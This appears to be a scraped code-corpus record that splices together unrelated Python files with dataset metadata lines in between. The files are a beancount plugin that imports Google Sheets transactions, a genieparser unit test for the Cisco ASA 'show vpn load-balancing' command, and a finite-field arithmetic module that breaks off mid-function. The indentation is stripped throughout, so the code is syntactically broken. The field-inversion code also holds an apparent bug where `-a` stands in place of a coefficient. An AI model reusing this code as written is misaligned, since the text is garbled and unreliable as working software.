entry_account = record.pop('account')
for k, v in record.items():
if v:
meta[k] = v
try:
if not entry_account:
errors.append(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
logger.warning(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
continue
entry = data.Transaction(
date=date,
narration=narration,
payee=payee,
tags=tags,
meta=meta,
links=links,
flag='*',
postings=[
data.Posting(
account=account,
units=data.Amount(amount, currency),
cost=None,
price=None,
flag='*',
meta={}
),
data.Posting(
account=entry_account,
units=data.Amount(-amount, currency),
cost=None,
price=None,
flag='*',
meta={}
)
]
)
entries.append(entry)
except Exception as exc:
logger.error(f"Error while parsing {record}", exc_info=exc)
errors.append(str(exc))
logger.info(f"Loaded {len(entries)} entries for {account} from {document_name}.{document_tab}")
return entries
| 31.650485
| 100
| 0.58456
|
import logging
import decimal
import pprint
import typing
import datetime
import dateparser
import pathlib
import slugify
from beancount.core import data
from coolbeans.utils import safe_plugin, get_setting
from coolbeans.tools.sheets import google_connect, safe_open_sheet
from coolbeans.plugins.accountsync import apply_coolbean_settings
import gspread
STRIP_SYMOLS = '₱$'
DEFAULT_CURRENCY = "USD"
logger = logging.getLogger(__name__)
__plugins__ = ['apply_coolbean_settings', 'remote_entries_plugin']
def clean_slug(slug):
return slug.replace('-', '').lower()
def coolbean_sheets(entries, context):
settings = context.setdefault('coolbean-accounts', {})
for entry in entries:
if isinstance(entry, data.Open):
document = entry.meta.get('document_name', None)
tab = entry.meta.get('document_tab', None)
slug = entry.meta.get('slug', "")
if document and tab and slug:
settings[slug] = {
'account': entry.account,
'document': document,
'tab': tab,
'currencies': entry.currencies
}
else:
if document or tab:
print(f"Skipping {entry.account}: {document}/{tab}/{slug}")
return entries, []
def remote_entries(entries, options_map):
errors = []
settings = options_map['coolbeans']
secrets_file = get_setting('google-apis', settings)
connection = google_connect(secrets_file)
new_entries_path = None
new_entries_file = get_setting('new-entries-bean', settings)
if new_entries_file:
new_entries_path = pathlib.Path(new_entries_file)
remote_accounts = {}
for entry in entries:
if not isinstance(entry, data.Open):
continue
document_name = entry.meta.get('document_name', None)
default_currency = entry.currencies[0] if entry.currencies else DEFAULT_CURRENCY
if document_name:
options = dict(
document_name=document_name,
document_tab=entry.meta.get('document_tab', None),
reverse_amount=entry.meta.get('reverse', False),
default_currency=default_currency,
entry=entry,
entry_file=new_entries_path
)
remote_accounts[entry.account] = options
new_entries = []
for account, options in remote_accounts.items():
try:
new_entries += load_remote_account(
connection=connection,
errors=errors,
account=account,
options=options
)
except Exception as exc:
logger.error(f"while processing {account}", exc_info=exc)
if new_entries and new_entries_path:
from beancount.parser import printer
with new_entries_path.open("w") as stream:
printer.print_entries(new_entries, file=stream)
logger.info(f"Wrote {len(new_entries)} new account(s) to {new_entries_path}.")
return entries+new_entries, errors
remote_entries_plugin = safe_plugin(remote_entries)
ALIASES = {
'narration': ['description', 'notes', 'details', 'memo']
}
def clean_record(record: typing.Dict[str, str]):
new_record = {}
for k, v in record.items():
k = slugify.slugify(k.lower().strip())
v = str(v)
for field, names in ALIASES.items():
new_record.setdefault(field, '')
if k in names:
new_record[field] += ('. ' if new_record[field] else '') + v
k = None
break
if k == 'amount':
v = v.replace(',', '')
for s in STRIP_SYMOLS:
v = v.replace(s, '')
if v and not v[0].isdecimal() and not v[0]=='-':
v = v[1:]
try:
v = decimal.Decimal(v)
except decimal.InvalidOperation:
v = 0
if k:
new_record[k] = v
return new_record
def load_remote_account(
connection: gspread.Client,
errors: list,
account: str,
options: typing.Dict[str, str]
):
entries = []
document_name = options['document_name']
document_tab = options.get('document_tab', 0) or 0
default_currency = options['default_currency']
reverse_amount = options.get('reverse_amount', False)
if not document_name:
return
m = -1 if reverse_amount else 1
logger.info(f"Attempting to download entries for {account} from {document_name}.{document_tab}")
workbook = connection.open(document_name)
sheet = None
try:
document_tab = int(document_tab)
sheet = workbook.get_worksheet(document_tab)
except ValueError:
pass
if sheet is None:
sheet = workbook.worksheet(document_tab)
records = sheet.get_all_records()
import re
row = 0
for record in records:
row += 1
record = clean_record(record)
if 'date' not in record or not record['date']:
continue
if 'amount' not in record or not record['amount']:
continue
narration = record.pop('narration', None)
payee = record.pop('payee', None)
tagstr = record.pop('tags', '')
tags = set(re.split(r'\W+', tagstr)) if tagstr else set()
date = dateparser.parse(record.pop('date'))
if date:
date = datetime.date(year=date.year, month=date.month, day=date.day)
linkstr = record.pop('links', '')
links = set(re.split(r'\W+', linkstr)) if linkstr else set()
meta = {
'filename': str(options['entry_file']),
'lineno': 0,
'document-sheet-row': f"{document_name}/{document_tab}/{row+1}"
}
amount = decimal.Decimal(record.pop('amount')) * m
currency = record.pop('currency', default_currency)
entry_account = record.pop('account')
for k, v in record.items():
if v:
meta[k] = v
try:
if not entry_account:
errors.append(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
logger.warning(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
continue
entry = data.Transaction(
date=date,
narration=narration,
payee=payee,
tags=tags,
meta=meta,
links=links,
flag='*',
postings=[
data.Posting(
account=account,
units=data.Amount(amount, currency),
cost=None,
price=None,
flag='*',
meta={}
),
data.Posting(
account=entry_account,
units=data.Amount(-amount, currency),
cost=None,
price=None,
flag='*',
meta={}
)
]
)
entries.append(entry)
except Exception as exc:
logger.error(f"Error while parsing {record}", exc_info=exc)
errors.append(str(exc))
logger.info(f"Loaded {len(entries)} entries for {account} from {document_name}.{document_tab}")
return entries
| true
| true
|
790b256629c5649137035d014ee8ea6aa54c079f
| 4,072
|
py
|
Python
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | 2
|
2021-01-27T03:37:39.000Z
|
2021-01-27T03:40:50.000Z
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | 1
|
2020-08-01T00:23:31.000Z
|
2020-08-01T00:40:05.000Z
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from unittest.mock import Mock
# PyATS
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError, \
SchemaMissingKeyError
from genie.libs.parser.asa.show_vpn import ShowVPNLoadBalancing
# ============================================
# unit test for 'show vpn load-balancing'
# =============================================
class TestShowVPNLoadBalancing(unittest.TestCase):
"""
unit test for show vpn load-balancing
"""
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'cluster_ip': 'cluster1',
'encryption': 'Enabled',
'failover': 'n/a',
'peers': {
1: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.1*',
'role': 'Master',
},
2: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.2',
'role': 'Backup',
},
},
'peers_count': 1,
'role': 'Master',
'status': 'Enabled',
'total_license_load': {
1: {
'anyconnect_premium_essentials': {
'limit': 250,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 250,
'load': 1,
'used': 2,
},
'public_ip': '10.246.0.1*',
},
2: {
'anyconnect_premium_essentials': {
'limit': 0,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 0,
'load': 0,
'used': 0,
},
'public_ip': '10.246.0.2',
},
},
}
golden_output = {'execute.return_value': '''
vASA-VPN-20#show vpn load-balancing
--------------------------------------------------------------------------
Status Role Failover Encryption Peers Cluster IP
--------------------------------------------------------------------------
Enabled Master n/a Enabled 1 cluster1
Peers:
--------------------------------------------------------------------------
Role Pri Model Load-Balancing Version Public IP
--------------------------------------------------------------------------
Master 5 ASA-VASA 4 10.246.0.1*
Backup 5 ASA-VASA 4 10.246.0.2
Total License Load:
--------------------------------------------------------------------------
AnyConnect Premium/Essentials Other VPN Public IP
----------------------------- ---------------------
Limit Used Load Limit Used Load
--------------------------------------------------------------------------
250 0 0% 250 2 1% 10.246.0.1*
0 0 0% 0 0 0% 10.246.0.2
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowVPNLoadBalancing(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
route_obj = ShowVPNLoadBalancing(device=self.device)
parsed_output = route_obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| 35.408696
| 82
| 0.370088
|
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError, \
SchemaMissingKeyError
from genie.libs.parser.asa.show_vpn import ShowVPNLoadBalancing
class TestShowVPNLoadBalancing(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'cluster_ip': 'cluster1',
'encryption': 'Enabled',
'failover': 'n/a',
'peers': {
1: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.1*',
'role': 'Master',
},
2: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.2',
'role': 'Backup',
},
},
'peers_count': 1,
'role': 'Master',
'status': 'Enabled',
'total_license_load': {
1: {
'anyconnect_premium_essentials': {
'limit': 250,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 250,
'load': 1,
'used': 2,
},
'public_ip': '10.246.0.1*',
},
2: {
'anyconnect_premium_essentials': {
'limit': 0,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 0,
'load': 0,
'used': 0,
},
'public_ip': '10.246.0.2',
},
},
}
golden_output = {'execute.return_value': '''
vASA-VPN-20#show vpn load-balancing
--------------------------------------------------------------------------
Status Role Failover Encryption Peers Cluster IP
--------------------------------------------------------------------------
Enabled Master n/a Enabled 1 cluster1
Peers:
--------------------------------------------------------------------------
Role Pri Model Load-Balancing Version Public IP
--------------------------------------------------------------------------
Master 5 ASA-VASA 4 10.246.0.1*
Backup 5 ASA-VASA 4 10.246.0.2
Total License Load:
--------------------------------------------------------------------------
AnyConnect Premium/Essentials Other VPN Public IP
----------------------------- ---------------------
Limit Used Load Limit Used Load
--------------------------------------------------------------------------
250 0 0% 250 2 1% 10.246.0.1*
0 0 0% 0 0 0% 10.246.0.2
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowVPNLoadBalancing(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
route_obj = ShowVPNLoadBalancing(device=self.device)
parsed_output = route_obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| true
| true
|
790b2616f583dbaa08f38fd927e913e89fb35cb7
| 34,961
|
py
|
Python
|
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | 3
|
2015-09-29T16:22:15.000Z
|
2020-03-30T23:34:51.000Z
|
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | null | null | null |
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | 2
|
2017-08-01T16:21:25.000Z
|
2020-03-30T23:34:53.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2013-2014
Author : Edouard Cuvelier
Affiliation : Université catholique de Louvain - ICTEAM - UCL Crypto Group
Address : Place du Levant 3, 1348 Louvain-la-Neuve, BELGIUM
email : firstname.lastname@uclouvain.be
"""
from numpy import *
import gmpy
from Crypto.Random.random import randint
import random as rd
import tools.fingexp as fingexp
import tools.utils as utils
class Field(fingexp.FingExp):
'Class for Field'
def __init__(self,p):
'''Defines the modulus p which must be a prime
'''
self.F = self
self.p = gmpy.mpz(p) # prime modulus
self.char = self.p # characteristic
self.q = self.p+1 # order+1 #TODO : correct?
assert gmpy.is_prime(p)
self.rep = None
self.g = None
'''
g is a random quadratic residue used to compute square roots and it is
initialized the first time a square root is computed
'''
self.to_fingerprint = ["p"]
self.to_export = {"fingerprint": [],"value": ["p"]}
super(Field, self).__init__()
def load(self, data, fingerprints):
self.p = utils.b64tompz(data["p"])
def one(self):
'unit element for multiplication'
return FieldElem(1, self)
def zero(self):
'unit element for addition'
return FieldElem(0,self)
def elem(self,x):
''' return an element of value x
'''
if isinstance(x,FieldElem):
assert x.F == self
return x
m = gmpy.mpz(1)
assert isinstance(x,int) or isinstance(x, long) or type(x)==type(m)
return FieldElem(x,self)
def random(self,low=1,high=None):
''' Return a random element of the Field
'''
if high == None :
high = int(self.p-1)
rand = randint(low,high)
return self.elem(rand)
def __eq__(self, other):
'testing if we are working in the same field'
try:
return (self.p == other.p)
except:
return False
def add(self, a, b):
'''
field operation: addition mod p
'''
return FieldElem((a.val + b.val) % self.p, self)
def sub(self, a, b):
'''
field operation: substraction mod p
'''
return FieldElem((a.val - b.val) % self.p, self)
def neg(self, a):
'''
field operation: opposite mod p
'''
return FieldElem((self.p - a.val ) % self.p, self)
def mul(self, a, b):
'''
field operation: multiplication of field elements
'''
"""
if isinstance(a,FieldElem) and isinstance(b, FieldElem) and not a.F == b.F :
raise Exception("multiplication between elements of different fields")
"""
if not isinstance(b,FieldElem) :
# Multiplication by a scalar
if b<0:
return self.smul(-a,-b)
return self.smul(a,b)
else:
return self.pmul(a,b)
def smul(self,a,b):
''' Return a*b where a or b is scalar
'''
if not isinstance(b,FieldElem):
# b is scalar
#return self.dbleAndAdd(a,a,b)
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
#return self.pmul(a,a.F.elem(b))
else :
# a is scalar
#return self.dbleAndAdd(b,b,a)
return self.smul(b,a)
def sm(self,b,a):
''' Quick multiplication between a field element a and a scalar b
'''
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
def pmul(self,a,b):
''' product between two field element in Fp
'''
return FieldElem((a.val * b.val) % self.p, self)
def dbleAndAdd(self,P,Pp,n):
'return n*P using double and add technique'
#print "dblaad"
if n == 0 :
return self.zero();
if n == 1 :
return P
elif n%2 == 1 :
Q = self.dbleAndAdd(P,Pp,(n-1)/2)
return P+Q+Q
elif n%2 == 0 :
Q = self.dbleAndAdd(P,Pp,n/2)
return Q+Q
def powop(self, a, b):
'return a**b'
m = gmpy.mpz(1)
#self.count = 0
'exponentiation by a scalar'
if not isinstance(b, int) and not isinstance(b, long) and not type(b)==type(m):
raise Exception("Exponentation by a non integer, long or mpz")
c = b
if c > self.char-1 or c<0:
c = b%(self.char-1)
#elif :
# return self.powop(a.invert(),(-c))
if c == 0 :
assert not a.val%self.char == 0
return self.one()
elif c == 1 :
return a
else :
return self.sqrtAndMultply(a,a, c)
#return FieldElem(pow(a.val,b,self.char))
def sqrtAndMultply(self,P,Pp,n):
'return P**n using square and multiply technique'
if n == 0 :
return self.one()
elif n == 1 :
return P
elif n%2 == 1 :
Q = self.sqrtAndMultply(P,Pp,(n-1)/2)
return P*self.square(Q)
elif n%2 == 0 :
Q = self.sqrtAndMultply(P,Pp,n/2)
return self.square(Q)
def square(self,a):
'''
This method returns the square of a
'''
return FieldElem(pow(a.val,2, self.p), self)
def invert(self,a):
assert not (a.val%self.p == 0) # Do not invert zero!
return FieldElem(gmpy.invert(a.val, self.p), self)
#def invertible(self,a):
#return not int(a.invert().val) == 0
def div(self,a,b):
assert not (b.val%self.p == 0) # Do not invert zero!
return FieldElem((a.val*self.invert(b).val % self.p),self)
def findnonresidue(self):
'''
find a random non quadratic residue in the Field F,
that is, find g that is not a square in F, this is
needed to compute square roots
'''
g=self.random()
while g.isquadres():
#print g, " is quad res in ", self
g = self.random()
return g
def __str__(self):
return "F_"+str(self.p)
def jsonable(self):
return {'type': 'FqField', 'p': self.p}
class FieldElem():
def __init__(self, val, F):
'''Creating a new field element.
'''
#assert isinstance(F,Field)
self.F = F
self.val = gmpy.mpz(val)
self.poly = polynom(self.F,[self])
#self.to_fingerprint = ["F", "val"]
#self.to_export = {"fingerprint": ["F"],
# "value": ["val"]}
#super(FieldElem, self).__init__()
def __eq__(self, other):
try:
return ((self.val%self.F.char) == (other.val%self.F.char) and self.F == other.F)
except:
return False
def __add__(self, other):
return self.F.add(self, other)
def __neg__(self):
return self.F.neg(self)
def __sub__(self, other):
return self.F.sub(self, other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
return self.F.mul(self, other)
def __rmul__(self, other):
return self.__mul__(other)
def __pow__(self, e):
return self.F.powop(self, e)
def __div__(self,other):
return self.F.div(self,other)
def __truediv__(self,other):
return self.F.div(self,other)
def __str__(self):
return str(self.val)
def iszero(self):
return self == self.F.zero()
def invert(self):
return self.F.invert(self)
def invertible(self):
return self.F.invertible(self)
def isquadres(self):
''' This method return True if the element is a quadratic residue mod q
different than zero
it returns False otherwhise
'''
if (self+self.F.zero()).iszero() :
# case of element is zero
return False
else :
# If F's order is prime we use Euler's criterium
c = self**((self.F.q-1)/2) #TODO: Optimize this
return c==self.F.one()
def squareroot(self):
''' This method returns the positive square root of
an element of the field
using the Tonelli-Shanks algorithm
Carefull : if the element has no square root, the method does not
check this case and raises an error. Verification has to be done
before calling the method.
'''
g = self.F.g
if g == None :
g = self.F.findnonresidue()
self.F.g = g
q = self.F.q
s=0
t=self.F.q-1
while t%2==0:
s=s+1
t=t/2
# q-1 = (2**s)*t
e = 0
for i in range(2,s+1):
b = 2**(i-1)
b1 = b*2 # b1 = 2**i
c = ((self)*(g**(-e)))**((q-1)/b1)
if not c==self.F.one() :
e = e+b
h = self*(g**(-e))
b = (g**(e/2))*(h**((t+1)/2))
assert b**2 == self # FAILURE to find square root
return b
def fingerprint(self):
return fingexp.fingerprint(self.val)
def jsonable(self):
return {'type': 'FieldElem', 'F': self.F, 'val': self.val}
class ExtensionField(Field):
'''
This class defines extension fields and inherits field methods.
Depending on the degree of the extension field, we use
different algorithms to optimize the operations
'''
def __init__(self,F,irpoly,g=None,rep=None):
'''Define the base Field or extension Field and the irreducible polynomial
F is the base field on top of which the extension
field is built
irpoly is the irreducible polynomial used to build
the extension field as F/irpoly
g is a non quadratic residue used to compute square
roots, if it is set to None, computing a square root
will initialize g
rep is the representation of the root of irpoly
(note that letter 'A' is reserved for the Complex extension field)
'''
self.F = F
self.irpoly = irpoly
self.deg = len(irpoly.coef) # degree of the irreducible polynomial + 1
assert self.deg > 0
self.q = self.F.q**(self.deg-1) # order of the Field
self.tabular = self.table()
if rep == None :
self.rep = rd.choice(['B','C','D','E','F','G','H','J','K','L'])
#Choose a random representation letter
else :
self.rep = rep
self.char = F.char
self.primefield = gmpy.is_prime(self.char)
self.g = g # g is needed to compute square roots, it is a non quadratic residue
self.to_fingerprint = ["F","irpoly"]
self.to_export = {"fingerprint": [],"value": ["F","irpoly"]}
def one(self):
'unit element for multiplication'
One = [self.F.zero()]*(self.deg-1)
One[self.deg-2]= self.F.one()
return ExtensionFieldElem(self,polynom(self.F,One))
def zero(self):
'unit element for addition'
Zero = [self.F.zero()]*(self.deg-1)
return ExtensionFieldElem(self,polynom(self.F,Zero))
def unit(self):
''' root of the irreducible polynomial
e.g. return element 1*A+0 (or the complex value i) if the irpoly is X**2+1
'''
I = self.zero()
I.poly.coef[-2]=self.F.one()
return I
def elem(self,x):
''' Provided that x belongs to F, return an element of the extension field
of value x
'''
P = self.zero()
P.poly.coef[-1] = x
return P
def random(self):
''' Return a random element of the Extension Field
'''
polycoef = [0]*(self.deg-1)
for i in range(self.deg-1):
polycoef[i] = self.F.random()
poly = polynom(self.F,polycoef)
return ExtensionFieldElem(self,poly)
def __eq__(self, other):
'testing if we are working in the same extension field'
try:
return (self.F == other.F and self.irpoly == other.irpoly)
except:
return False
def add(self, a, b):
'''
field operation: addition of polynomial > addition of coefficients in the appropriate field
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
polysum = [0]*a.deg
for i in range(a.deg):
polysum[i]=a.poly.coef[i]+b.poly.coef[i]
P = polynom(self.F,polysum)
return ExtensionFieldElem(self,P)
def sub(self, a, b):
'''
field operation: substraction of polynomials > substraction of each coefficient in the appropriate field
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
c = self.neg(b)
return self.add(a,c)
def neg(self, a):
'''
field operation: opposite of a polynomial > opposite of each coefficient in appropriate field
'''
#assert a.F.F == self.F
ap = [0]*a.deg
for i in range(a.deg):
ap[i] = -a.poly.coef[i]
P = polynom(self.F,ap)
return ExtensionFieldElem(self,P)
def smul(self,a,b):
''' Return a*b where a or b is scalar
'''
if not isinstance(b,FieldElem):
# b is scalar
A = a.poly.coef
Pc = [0]*len(A)
for i in range(len(Pc)):
Pc[i] = A[i]*gmpy.mpz(b)
return ExtensionFieldElem(self,polynom(self.F,Pc))
else :
# a is scalar
return self.smul(b,a)
def pmul(self,a,b):
'''Multiplication between polynomials
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
# Simpler notations for reading
A = a.poly.coef
B = b.poly.coef
k = self.deg-1 # degree of the externsion field
if k == 2 and self.F.rep =='A':
# We are in the case that the extension field is Fp2
# We assume here that the irreductible polynom is X**2+1 (beta=-1)
# Complex multiplication
a0,a1,b0,b1 = A[0].val,A[1].val,B[0].val,B[1].val
p = self.char
v0 = a0*b0
v1 = a1*b1
c0 = ((a0+a1)*(b0+b1)-v0-v1)%p
c1 = (v1-v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c0e,c1e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
# In this case, use Karatsuba multiplication algorithm
# notations
a0 = A[0]
a1 = A[1]
b0 = B[0]
b1 = B[1]
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,b0)
v1 = self.F.pmul(a1,b1)
c0 = self.F.pmul((a0+a1),(b0+b1))-v0-v1 # coefficient of X
c1 = v1 + self.F.pmul(v0,beta) # independant term
cp = polynom(self.F,[c0,c1])
C = ExtensionFieldElem(self,cp)
return C
elif k == 3:
# In this case, use Karatsuba multiplication algorithm
# notations
a0,a1,a2 = A
b0,b1,b2 = B
beta = -self.irpoly.coef[-1]
v0,v1,v2 = self.F.pmul(a0,b0), self.F.pmul(a1,b1), self.F.pmul(a2,b2)
c0 = self.F.pmul((a0+a2),(b0+b2))-v0+v1-v2 # coefficient of X**2
c1 = self.F.pmul((a2+a1),(b2+b1))-v2-v1+self.F.pmul(beta,v0) # coefficient of X
c2 = v2+self.F.pmul(beta,(self.F.pmul((a1+a0),(b1+b0))-v1-v0)) # independant term
cp = polynom(self.F,[c0,c1,c2])
C = ExtensionFieldElem(self,cp)
return C
else :
prod = convolve(A,B)
return self.reduc2(prod) # return EProd % ired. polynomial
def square(self,a):
''' This algortihm returns the square of a in the field
using different methods if the degree of the extension
is 2,3 or more
'''
#print a.F
#print self
assert a.F == self
if not a.deg == self.deg-1 :
a = self.reduc(a)
#notations
A = a.poly.coef
k = self.deg-1 # degree of the extension
if k == 2 and self.F.rep == 'A':
# Using the complex multiplication
# We are in the case that the extension field is Fp2
# We assume here that the irreductible polynom is X**2+1 (beta=-1)
a1, a0 = A[0].val,A[1].val
p = self.char
v0 = a0*a1
c0 = ((a0+a1)*(a0-a1))%p
c1 = (v0+v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c1e,c0e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
# Using the complex multiplication
a1, a0 = A
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,a1)
c0 = self.F.pmul((a0+a1),(a0+self.F.pmul(a1,beta)))-v0-self.F.pmul(beta,v0)
c1 = v0+v0
cp = polynom(self.F,[c1,c0])
return ExtensionFieldElem(self,cp)
elif k == 3:
# Using Chung-Hasan Squaring2
a2,a1,a0 = A
#print a0
#print 'a0',a0.F, a0.F.deg-1
#print 'self',self.F, self.F.deg-1
assert a0.F == self.F
beta = -self.irpoly.coef[-1]
s0 = self.F.square(a0)
t1 = self.F.pmul(a0,a1)
s1 = t1+t1
s2 = self.F.square((a0-a1+a2))
t3 = a1*a2
s3 = t3+t3
s4 = self.F.square(a2)
c0 = s0 + self.F.pmul(beta,s3)
c1 = s1 + self.F.pmul(beta,s4)
c2 = s1 + s2 + s3 - s0 -s4
cp = polynom(self.F,[c2,c1,c0])
return ExtensionFieldElem(self,cp)
else :
return self.F.pmul(a,a)
def invert(self,a):
''' Ths method returns the inverse of a in the field
The inverse is computed by determining the Bezout coefficient using the
extended Euclide's algorithm or by specialized algorithms depending
on the degree of the extension (2 or 3)
'''
#assert self.invertible(a) #The element must be invertible
assert a.F == self
k = self.deg-1
if k == 2 and self.F.rep == 'A':
# inversion in a field of characteristic 2 over prime field
# We are in the case that the extension field is Fp2
# We assume here that the irreductible polynom is X**2+1 (mod=-1)
A = a.poly.coef
a1,a0 = A[0].val,A[1].val # a = a0+a1*i
p = self.char
norm = a0*a0+a1*a1
invnorm = gmpy.invert(norm,p)
c0 = (a0*invnorm) % p
c1 = (-a1*invnorm) % p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
invap = polynom(self.F,[c1e,c0e])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 2 :
# inversion in a field of characteristic 2 over prime field
A = a.poly.coef
a1,a0 = A[0],A[1] # a = a0+a1*i
#print 'A',A
#print 'a1',a1
mod = self.irpoly.coef[-1] # i**2 = -mod
#a1b,a0b,modb = self.F.elem(a1), self.F.elem(a0),self.F.elem(mod)
#print 'a1b',a1b
#a1b2 = self.F.square(a1b)
a12 = self.F.square(a1)
#mid = self.F.pmul(a1b2,modb)
mid = self.F.pmul(a12,mod)
#norm = self.F.square(a0b)+mid
norm = self.F.square(a0)+mid
#invnorm = self.F.invert(a0**2+mod*a1**2)
#invnorm = self.F.invert(norm.poly.coef[-1])
invnorm = self.F.invert(norm)
c = self.F.pmul(a0,invnorm) # c = -a1/(a0**2+mod*a1**2)
d = -self.F.pmul(a1,invnorm)
invap = polynom(self.F,[d,c])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 3 :
# inversion in char. 3 field
A = a.poly.coef
a2,a1,a0 = A[0],A[1],A[2]
mod = -self.irpoly.coef[-1]
z0 = self.F.zero()
z1 = self.F.one()
if a0 == z0:
#a0 = 0
if a1 == z0:
#a1 = 0
c0,c1,c2 = z0, self.F.invert(self.F.pmul(a2,mod)), z0
elif a2 == z0:
#a2 = 0
c0,c1,c2 = z0,z0,self.F.invert(self.F.pmul(a1,mod))
else :
#a1,a2 != 0
a22 = self.F.square(a2)
a12 = self.F.square(a1)
c2 = self.F.pmul(a12,self.F.invert((self.F.pmul(self.F.pmul(a22,a2),mod)+self.F.pmul(self.F.pmul(a12,a1),mod))))
c1 = self.F.pmul((z1-self.F.pmul(self.F.pmul(a1,c2),mod)),self.F.invert(self.F.pmul(a2,mod)))
c0 = self.F.pmul((-(self.F.pmul(self.F.pmul(a2,mod),c2))),self.F.invert(a1))
else :
#a0 != 0
if a1 == z0 and a2 == z0:
#a1 = 0 , a2 = 0
c0,c1,c2 = self.F.invert(a0),z0,z0
else :
a12 = self.F.pmul(a1,a2)
a12m = self.F.pmul(a12,mod)
a00 = self.F.square(a0)
abis = a00-a12m
if abis == z0:
#a0**2-(a1*a2*mod) = 0
a11 = self.F.square(a1)
a22 = self.F.square(a2)
a02 = self.F.pmul(a0,a2)
a01 = self.F.pmul(a0,a1)
c2 = self.F.pmul(-a,self.F.invert(self.F.pmul((a02-a11),mod)))
c1 = self.F.pmul(-a2,self.F.invert(a01-self.F.pmul(a22,mod)))
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul((z1-self.F.pmul(a1c2+a2c1,mod)),self.F.invert(a0))
else :
#a0**2-(a1*a2*mod) != 0
if a1 == z0:
#a1 = 0
inva0 = self.F.invert(a0)
a02 = self.F.pmul(a0,a2)
a000 = self.F.pmul(a00,a0)
a22 = self.F.square(a2)
a222 = self.F.pmul(a22,a2)
mm = self.F.square(mod)
a222mm = self.F.pmul(a222,mm)
c2 = self.F.pmul(-a02,self.F.invert(a000+a222mm))
a02m = self.F.pmul(a02,mod)
a02mc2 = self.F.pmul(a02m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(-a02mc2,inva00)
a2m = self.F.pmul(a2,mod)
a2mc1 = self.F.pmul(a2m,c1)
c0 = self.F.pmul(z1-a2mc1,inva0)
elif a2 == z0:
#a2 = 0
a11 = self.F.square(a1)
a111 = self.F.pmul(a11,a1)
a000 = self.F.pmul(a00,a0)
a111m = self.F.pmul(a111,mod)
inva0 = self.F.invert(a0)
c2 = self.F.pmul(a11,self.F.invert(a111m+a000))
a11m = self.F.pmul(a11,mod)
a11mc2 = self.F.pmul(a11m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(a11mc2-a1,inva00)
a1m = self.F.pmul(a1,mod)
a1mc2 = self.F.pmul(a1m,c2)
c0 = self.F.pmul(z1-a1mc2,inva0)
else :
#a1,a2 != 0
a01 = self.F.pmul(a0,a1)
a22 = self.F.square(a2)
a22m = self.F.pmul(a22,mod)
a02 = self.F.pmul(a0,a2)
a11 = self.F.square(a1)
abus = a01-a22m
